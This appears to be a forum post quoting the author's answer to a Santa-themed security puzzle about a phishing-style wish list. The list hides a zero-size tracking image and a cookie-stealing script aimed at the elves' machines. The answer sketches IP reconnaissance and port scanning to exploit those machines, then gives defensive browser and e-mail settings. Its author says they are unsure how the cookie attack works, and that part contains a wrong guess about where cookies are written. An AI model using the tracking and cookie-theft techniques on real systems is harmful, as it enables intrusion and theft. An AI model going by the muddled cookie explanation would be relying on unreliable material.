Ok, here is my e-mail to Ed on this.
==============
1) The .JPG is being used as a tracer. The "child" is the owner of the bumblesnowmonster.com website (or he r00ted it, but that is another story!) and he can check the website usage logs. He posted an IMG image link, so that anyone who reads that link from an HTML-enabled program (like a web browser, e-mail client, and/or Santa's inhouse application), will actually call that .JPG file from the www.bumblesnowmonster.com web server. And giving the Height and Width a 0 means the picture would be, in effect, invisible. But, for the owner of the bumblesnowmonster.com web server, in their server logs, they would have the IP address of the machine that read the "childs" wish list. That public IP would then be used as the place to attack! Obviously, the "child" only wants the IP addresses for Santa and his elves, so as to attack their machines to try and get into them to change their status from Bad to Good. So, the first thing you need to do is recon nascence. Find out what IP range Santa has, to then probe for machines that could be attacked to gain access to the internal DB. Start port scanning the IPs you get for open ports to then try and exploit.
2) I am not a programmer, so I don?t quite know the reason for the 2nd attack, but I will guess here. Document.location says that this is where the .CGI file is located, again at the www.bumblesnowmonster.com domain. And document.cookie says that this file is a cookie file, the kind of file that stores username, date, time, domain, website hit count, password, and many other personal items on the user machine. So, I guess that this SCRIPT command is pulling the GRAB.CGI file, and probably querying the elf workstation for the information in the CGI file. Maybe it is trying to get the logged on username of the elf, and their OS version, and browser version. Now, normally cookies are stored on the user workstation, not on the server (only in server memory, not physically written), so I don?t understand why this would be good for the ?child? to have the elves trigger the .CGI file. Maybe the cookie file that will be written will be put on the web server instead of the elf workstation. If so, then the ?child? could have all kinds of useful hacking information. But like I said, I am not sure if a cookie can work in reverse like this.
3) Altering the web application: 1- by using some form validation to not allow hypertext tags and/or script commands like <SCRIPT> or or . 2 ? make sure that local scripts on the website cannot be exploited and that their security is correct and not lax, like disabling FrontPage extensions (in case Santa had them put on on accident!) Altering the elf browsers: 1 ? change the ActiveX scripting permissions, setting them on Prompt to run, not on the default Enabled. Same for Java Scripting. Make them ask you to run; don?t let them run by default. That way, if something strange pops up asking you to let the script run, you can click No to prevent it. 2 ? Set the Internet Security Zone settings to High, instead of the Medium that it is on by default. High zone does not let scripts run at all; I don?t even think they can ask you to run if you set the zone to High for the Internet zone. That would just not let any scripts like these to run at all.
4) E-mail configuration: 1 ? set the e-mail clients to read e-mail in Plain Text only, not HTML formatted text. With a plain text e-mail client, you would read the HTML commands, not just the results of HTML. This way, you would open an e-mail, see all of the HTML formatting, and it would NOT run. It would all just be harmless text, like when we read the 2 commands on the Techrepublic.com web page. They did not harm us. 2 ? go to the Secure Content section in Outlook (if the elves use Outlook to read their e-mail), click the Internet zone, and click the Zone Settings button, then change the Security level to High. This is the same as the 2nd option for the elves browser windows. Set the security to High so scripts cannot run. So, if the e-mail client still was able to display HTML-formatted e-mail, this way the scripts from the Internet zone could not launch.